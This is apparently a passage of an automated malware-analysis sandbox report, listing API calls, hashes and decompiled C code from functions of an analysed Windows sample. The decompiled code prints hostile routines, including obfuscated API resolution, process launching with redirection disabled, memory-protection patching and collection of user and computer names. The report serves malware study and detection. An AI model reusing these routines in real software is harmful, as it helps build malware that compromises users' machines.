                                                              • Part of subcall function 00DD637D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63A8
                                                              • Part of subcall function 00DD637D: lstrlen.KERNEL32(00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63B0
                                                              • Part of subcall function 00DD637D: strcpy.NTDLL ref: 00DD63C7
                                                              • Part of subcall function 00DD637D: lstrcat.KERNEL32(00000000,00000000), ref: 00DD63D2
                                                              • Part of subcall function 00DD637D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63EF
                                                            • StrTrimA.SHLWAPI(00000000,00DD92AC,00000000,039C9630), ref: 00DD72FE
                                                              • Part of subcall function 00DD7067: lstrlen.KERNEL32(039C887A,00000000,00000000,00000000,00DD730A,00000000), ref: 00DD7077
                                                              • Part of subcall function 00DD7067: lstrlen.KERNEL32(?), ref: 00DD707F
                                                              • Part of subcall function 00DD7067: lstrcpy.KERNEL32(00000000,039C887A), ref: 00DD7093
                                                              • Part of subcall function 00DD7067: lstrcat.KERNEL32(00000000,?), ref: 00DD709E
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 00DD731C
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00DD732A
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00DD732E
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00DD735E
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DD736D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,039C9630), ref: 00DD737D
                                                            • HeapFree.KERNEL32(00000000,?), ref: 00DD738E
                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00DD739C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                            • String ID: F{U{
                                                            • API String ID: 1837416118-3347341033
                                                            • Opcode ID: 5a0438a2990f147a2d90102ae9a1acb50740f701bcf6cfa4eb6f2b0a39d4fe67
                                                            • Instruction ID: 97f0c02aba8f8ad4e2b7c88396f22b8f2d5daf7d86cc3883fecd7ae771877eb4
                                                            • Opcode Fuzzy Hash: 5a0438a2990f147a2d90102ae9a1acb50740f701bcf6cfa4eb6f2b0a39d4fe67
                                                            • Instruction Fuzzy Hash: D571AE71502304AFC721DBADEC88E677BEDEB88310B094457F949C3360E636E8059B76
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04566975, Relevance: 22.6, APIs: 15, Instructions: 130memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,04583A85), ref: 0456699E
                                                            • RtlDeleteCriticalSection.NTDLL(0458C2E0), ref: 045669D1
                                                            • RtlDeleteCriticalSection.NTDLL(0458C300), ref: 045669D8
                                                            • CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A07
                                                            • ReleaseMutex.KERNEL32(0000045C,00000000,?,?,?,04583A85), ref: 04566A18
                                                            • CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A24
                                                            • ResetEvent.KERNEL32(00000000,00000000,?,?,?,04583A85), ref: 04566A30
                                                            • CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A3C
                                                            • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,04583A85), ref: 04566A42
                                                            • SleepEx.KERNEL32(00000064,00000001,?,?,04583A85), ref: 04566A56
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04583A85), ref: 04566A79
                                                            • RtlRemoveVectoredExceptionHandler.NTDLL(01348118), ref: 04566AB2
                                                            • SleepEx.KERNEL32(00000064,00000001,?,?,04583A85), ref: 04566ACE
                                                            • CloseHandle.KERNEL32(049B8418,?,?,04583A85), ref: 04566AF5
                                                            • LocalFree.KERNEL32(?,?,04583A85), ref: 04566B05
                                                              • Part of subcall function 0456FBEE: GetVersion.KERNEL32(?,00000000,73BCF720,?,0456698F,00000000,?,?,?,04583A85), ref: 0456FC12
                                                              • Part of subcall function 0456FBEE: GetModuleHandleA.KERNEL32(?,049B9759,?,0456698F,00000000,?,?,?,04583A85), ref: 0456FC2F
                                                              • Part of subcall function 0456FBEE: GetProcAddress.KERNEL32(00000000), ref: 0456FC36
                                                              • Part of subcall function 0456CFBA: RtlEnterCriticalSection.NTDLL(0458C300), ref: 0456CFC4
                                                              • Part of subcall function 0456CFBA: RtlLeaveCriticalSection.NTDLL(0458C300), ref: 0456D000
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Handle$CloseCriticalSectionSleep$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                                            • String ID:
                                                            • API String ID: 1924086638-0
                                                            • Opcode ID: 055163d4036342ecbba27399e68c8f4a823de23cb47d912cb97b4aee6463ca95
                                                            • Instruction ID: 4e22ff798378b62067f6d3fe561785a32c9bc6b3af4bb8dc36ef8a1bb681bd1d
                                                            • Opcode Fuzzy Hash: 055163d4036342ecbba27399e68c8f4a823de23cb47d912cb97b4aee6463ca95
                                                            • Instruction Fuzzy Hash: 55413031600202EBDB21AFA5FCC4A5877AAFB40745B55502DF606F7290CF79AC98FB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD6D30, Relevance: 16.6, APIs: 11, Instructions: 149timememoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 83%
                                                            			E00DD6D30(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xdda298);
					_v20 = 0;
					_v16 = 0;
					L00DD7DDC();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xdda2c4; // 0x24c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xdda2a4 = 5;
						} else {
							_t69 = E00DD14C4(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xdda2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00DD2FE6( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E00DD1723(_t73, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xdda29c);
							goto L21;
						} else {
							__eflags =  *0xdda2a0; // 0x1
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00DD454A();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xdda2a0);
								L21:
								L00DD7DDC();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0xdda290, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                            0x00dd6d30
                                                            0x00dd6d42
                                                            0x00dd6d45
                                                            0x00dd6d51
                                                            0x00dd6d59
                                                            0x00dd6d5c
                                                            0x00dd6ec2
                                                            0x00dd6d62
                                                            0x00dd6d62
                                                            0x00dd6d64
                                                            0x00dd6d69
                                                            0x00dd6d6a
                                                            0x00dd6d70
                                                            0x00dd6d73
                                                            0x00dd6d76
                                                            0x00dd6d84
                                                            0x00dd6d8f
                                                            0x00dd6d92
                                                            0x00dd6d94
                                                            0x00dd6da1
                                                            0x00dd6dab
                                                            0x00dd6daf
                                                            0x00dd6db2
                                                            0x00dd6db7
                                                            0x00dd6dc2
                                                            0x00dd6dc2
                                                            0x00dd6db9
                                                            0x00dd6db9
                                                            0x00dd6dc0
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd6dc0
                                                            0x00dd6dcc
                                                            0x00000000
                                                            0x00dd6dcf
                                                            0x00dd6dd3
                                                            0x00dd6dde
                                                            0x00dd6dde
                                                            0x00dd6de5
                                                            0x00dd6dea
                                                            0x00dd6df1
                                                            0x00dd6dfa
                                                            0x00dd6e00
                                                            0x00dd6e03
                                                            0x00dd6e0a
                                                            0x00dd6e0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd6e0f
                                                            0x00dd6e12
                                                            0x00dd6e15
                                                            0x00dd6e18
                                                            0x00000000
                                                            0x00dd6e1a
                                                            0x00dd6e24
                                                            0x00dd6e29
                                                            0x00dd6e29
                                                            0x00000000
                                                            0x00dd6e57
                                                            0x00dd6e57
                                                            0x00dd6e5c
                                                            0x00dd6e7b
                                                            0x00dd6e7d
                                                            0x00dd6e82
                                                            0x00dd6e83
                                                            0x00000000
                                                            0x00dd6e5e
                                                            0x00dd6e5e
                                                            0x00dd6e64
                                                            0x00000000
                                                            0x00dd6e66
                                                            0x00dd6e66
                                                            0x00dd6e6b
                                                            0x00dd6e6d
                                                            0x00dd6e72
                                                            0x00dd6e73
                                                            0x00dd6e89
                                                            0x00dd6e89
                                                            0x00dd6e91
                                                            0x00dd6e9c
                                                            0x00dd6e9f
                                                            0x00dd6eaa
                                                            0x00dd6eac
                                                            0x00dd6eae
                                                            0x00dd6eb1
                                                            0x00000000
                                                            0x00dd6eb7
                                                            0x00000000
                                                            0x00dd6eb7
                                                            0x00dd6eb1
                                                            0x00dd6e64
                                                            0x00000000
                                                            0x00dd6e5c
                                                            0x00dd6e2c
                                                            0x00dd6e2e
                                                            0x00dd6e31
                                                            0x00dd6e32
                                                            0x00dd6e32
                                                            0x00dd6e36
                                                            0x00dd6e40
                                                            0x00dd6e40
                                                            0x00dd6e46
                                                            0x00dd6e49
                                                            0x00dd6e49
                                                            0x00dd6e4f
                                                            0x00dd6e4f
                                                            0x00dd6ecc
                                                            0x00000000

                                                            APIs
                                                            • memset.NTDLL ref: 00DD6D45
                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00DD6D51
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00DD6D76
                                                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00DD6D92
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DD6DAB
                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00DD6E40
                                                            • CloseHandle.KERNEL32(?), ref: 00DD6E4F
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00DD6E89
                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00DD5FE7), ref: 00DD6E9F
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DD6EAA
                                                              • Part of subcall function 00DD14C4: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,039C9318,00000000,?,73BCF710,00000000,73BCF730), ref: 00DD1513
                                                              • Part of subcall function 00DD14C4: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,039C9350,?,00000000,30314549,00000014,004F0053,039C930C), ref: 00DD15B0
                                                              • Part of subcall function 00DD14C4: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DD6DBE), ref: 00DD15C2
                                                            • GetLastError.KERNEL32 ref: 00DD6EBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                            • String ID:
                                                            • API String ID: 3521023985-0
                                                            • Opcode ID: c0a78d320ca634c053a210965ae8722ffa25a73d2144843217317914701106e1
                                                            • Instruction ID: e34aae76eab0faf22758e9beb2e837d830d1d37fb9b22a5f2918c5b40ec920e8
                                                            • Opcode Fuzzy Hash: c0a78d320ca634c053a210965ae8722ffa25a73d2144843217317914701106e1
                                                            • Instruction Fuzzy Hash: E4513575906228AECF119F95EC44DEEBFB9EF09760F248217F414E2290D7719A40CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04562577, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625C4
                                                            • VirtualProtect.KERNELBASE(00000000,00000000,00000040,00000200,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625D6
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 045625E5
                                                            • VirtualProtect.KERNELBASE(00000000,00000000,00000200,00000200,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625F6
                                                            • VirtualProtect.KERNELBASE(?,00000005,00000040,00000400,045884F0,00000018,0456A14E,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000), ref: 0456262C
                                                            • VirtualProtect.KERNELBASE(?,00000004,?,?,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 04562647
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,045884F0,00000018,0456A14E,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000), ref: 0456265C
                                                            • VirtualProtect.KERNELBASE(?,00000004,00000040,?,045884F0,00000018,0456A14E,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000), ref: 04562689
                                                            • VirtualProtect.KERNELBASE(?,00000004,?,?,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045626A3
                                                            • GetLastError.KERNEL32(?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045626AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3676034644-0
                                                            • Opcode ID: 58edd9677edac7b953cde57706af04910106bb8fb4e069304025af4f63e7d3e1
                                                            • Instruction ID: 988a2264ce3ab14ec41d869248d86b0a4228ffe0d2446f55a40140b79cf08778
                                                            • Opcode Fuzzy Hash: 58edd9677edac7b953cde57706af04910106bb8fb4e069304025af4f63e7d3e1
                                                            • Instruction Fuzzy Hash: 64412F71900709AFDB31AFA5DC44EAAB7B5FB08350F008659E657A75A0EB34F805EF20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD4BD9, Relevance: 13.6, APIs: 9, Instructions: 110librarymemoryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E00DD4BD9(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E00DD2039(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00DD7801( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0xdda2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0xdda2d4; // 0x2bed5a8
					_t18 = _t50 + 0xddb55b; // 0x73797325
					_t52 = E00DD6ECF(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0xdda2d4; // 0x2bed5a8
						_t20 = _t53 + 0xddb73d; // 0x39c8ce5
						_t21 = _t53 + 0xddb0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32); // executed
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xdda290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00DD77EC(_t76);
				goto L12;
			}



















                                                            0x00dd4be2
                                                            0x00dd4be2
                                                            0x00dd4bf0
                                                            0x00dd4bf9
                                                            0x00dd4bfc
                                                            0x00dd4d0e
                                                            0x00dd4d15
                                                            0x00dd4d15
                                                            0x00dd4c0b
                                                            0x00dd4c13
                                                            0x00dd4c18
                                                            0x00dd4c1b
                                                            0x00dd4c30
                                                            0x00dd4c36
                                                            0x00dd4c37
                                                            0x00dd4c3a
                                                            0x00dd4c40
                                                            0x00dd4c43
                                                            0x00dd4c48
                                                            0x00dd4c50
                                                            0x00dd4c57
                                                            0x00dd4c5e
                                                            0x00dd4c61
                                                            0x00dd4cf5
                                                            0x00dd4c67
                                                            0x00dd4c67
                                                            0x00dd4c6c
                                                            0x00dd4c73
                                                            0x00dd4c87
                                                            0x00dd4c8b
                                                            0x00dd4cdc
                                                            0x00dd4c8d
                                                            0x00dd4c8d
                                                            0x00dd4c94
                                                            0x00dd4c9b
                                                            0x00dd4cb3
                                                            0x00dd4cb9
                                                            0x00dd4cbd
                                                            0x00dd4cd7
                                                            0x00dd4cbf
                                                            0x00dd4cc8
                                                            0x00dd4ccd
                                                            0x00dd4ccd
                                                            0x00dd4cbd
                                                            0x00dd4ced
                                                            0x00dd4ced
                                                            0x00dd4c61
                                                            0x00dd4cfc
                                                            0x00dd4d05
                                                            0x00dd4d09
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00DD2039: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DD4BF5,?,?,?,?,00000000,00000000), ref: 00DD205E
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DD2080
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DD2096
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DD20AC
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DD20C2
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DD20D8
                                                            • memset.NTDLL ref: 00DD4C43
                                                              • Part of subcall function 00DD6ECF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00DD4C5C,73797325), ref: 00DD6EE0
                                                              • Part of subcall function 00DD6ECF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00DD6EFA
                                                            • GetModuleHandleA.KERNEL32(4E52454B,039C8CE5,73797325), ref: 00DD4C7A
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00DD4C81
                                                            • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DD4C9B
                                                            • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DD4CB9
                                                            • CloseHandle.KERNEL32(00000000), ref: 00DD4CC8
                                                            • CloseHandle.KERNEL32(?), ref: 00DD4CCD
                                                            • GetLastError.KERNEL32 ref: 00DD4CD1
                                                            • HeapFree.KERNEL32(00000000,?), ref: 00DD4CED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                                            • String ID:
                                                            • API String ID: 91923200-0
                                                            • Opcode ID: 049df9efdbbb170ab9b728a1835e63c0f3c9dd3883348bf3eff9ab39c116bb21
                                                            • Instruction ID: de26de67a1ca6b132cba8c0e4e38c2a4b40c9b963e8c5b494a68cf634f82c810
                                                            • Opcode Fuzzy Hash: 049df9efdbbb170ab9b728a1835e63c0f3c9dd3883348bf3eff9ab39c116bb21
                                                            • Instruction Fuzzy Hash: F8311875902219FFCB11AFE9DC489AEBFB9EF08350F104452E505E3221D775AA45DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD4E2A, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 74%
                                                            			E00DD4E2A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00DD7DD6();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xdda2d4; // 0x2bed5a8
				_t5 = _t13 + 0xddb84d; // 0x39c8df5
				_t6 = _t13 + 0xddb580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00DD7ABA();
				_t17 = CreateFileMappingW(0xffffffff, 0xdda2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                            0x00dd4e2a
                                                            0x00dd4e32
                                                            0x00dd4e36
                                                            0x00dd4e3c
                                                            0x00dd4e41
                                                            0x00dd4e46
                                                            0x00dd4e49
                                                            0x00dd4e4c
                                                            0x00dd4e51
                                                            0x00dd4e52
                                                            0x00dd4e55
                                                            0x00dd4e5a
                                                            0x00dd4e61
                                                            0x00dd4e6b
                                                            0x00dd4e6d
                                                            0x00dd4e6e
                                                            0x00dd4e71
                                                            0x00dd4e8d
                                                            0x00dd4e93
                                                            0x00dd4e97
                                                            0x00dd4ee5
                                                            0x00dd4e99
                                                            0x00dd4ea6
                                                            0x00dd4eb6
                                                            0x00dd4ebe
                                                            0x00dd4ed0
                                                            0x00dd4ed4
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd4ec0
                                                            0x00dd4ec3
                                                            0x00dd4ec8
                                                            0x00dd4eca
                                                            0x00dd4eca
                                                            0x00dd4ea8
                                                            0x00dd4eaa
                                                            0x00dd4ed6
                                                            0x00dd4ed7
                                                            0x00dd4ed7
                                                            0x00dd4ea6
                                                            0x00dd4eec

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00DD5E63,?,00000001,?), ref: 00DD4E36
                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00DD4E4C
                                                            • _snwprintf.NTDLL ref: 00DD4E71
                                                            • CreateFileMappingW.KERNELBASE(000000FF,00DDA2F8,00000004,00000000,00001000,?), ref: 00DD4E8D
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DD5E63,?), ref: 00DD4E9F
                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00DD4EB6
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DD5E63), ref: 00DD4ED7
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DD5E63,?), ref: 00DD4EDF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1814172918-0
                                                            • Opcode ID: 94ea0f29f8880bf8290d1518c0d63749a3b68237ad0c295956d9850e85496077
                                                            • Instruction ID: 6a1a5c20590dd16e34af6759b02c75196aba06d1738bc94788edf3b072479e6e
                                                            • Opcode Fuzzy Hash: 94ea0f29f8880bf8290d1518c0d63749a3b68237ad0c295956d9850e85496077
                                                            • Instruction Fuzzy Hash: 8D21AE76641218FBCB21EB68EC05FAEB7A9AB44750F244123F905E63D0E77199008B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04563782, Relevance: 12.1, APIs: 8, Instructions: 109memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(00000000,04569A91), ref: 045637B9
                                                            • RtlAllocateHeap.NTDLL(00000000,04569A91), ref: 045637D0
                                                            • GetUserNameW.ADVAPI32(00000000,04569A91), ref: 045637DD
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04569A91,?,?,?,00000000,045681F8), ref: 04563803
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0456382A
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0456383E
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0456384B
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0456386E
                                                            Memory Dump Source
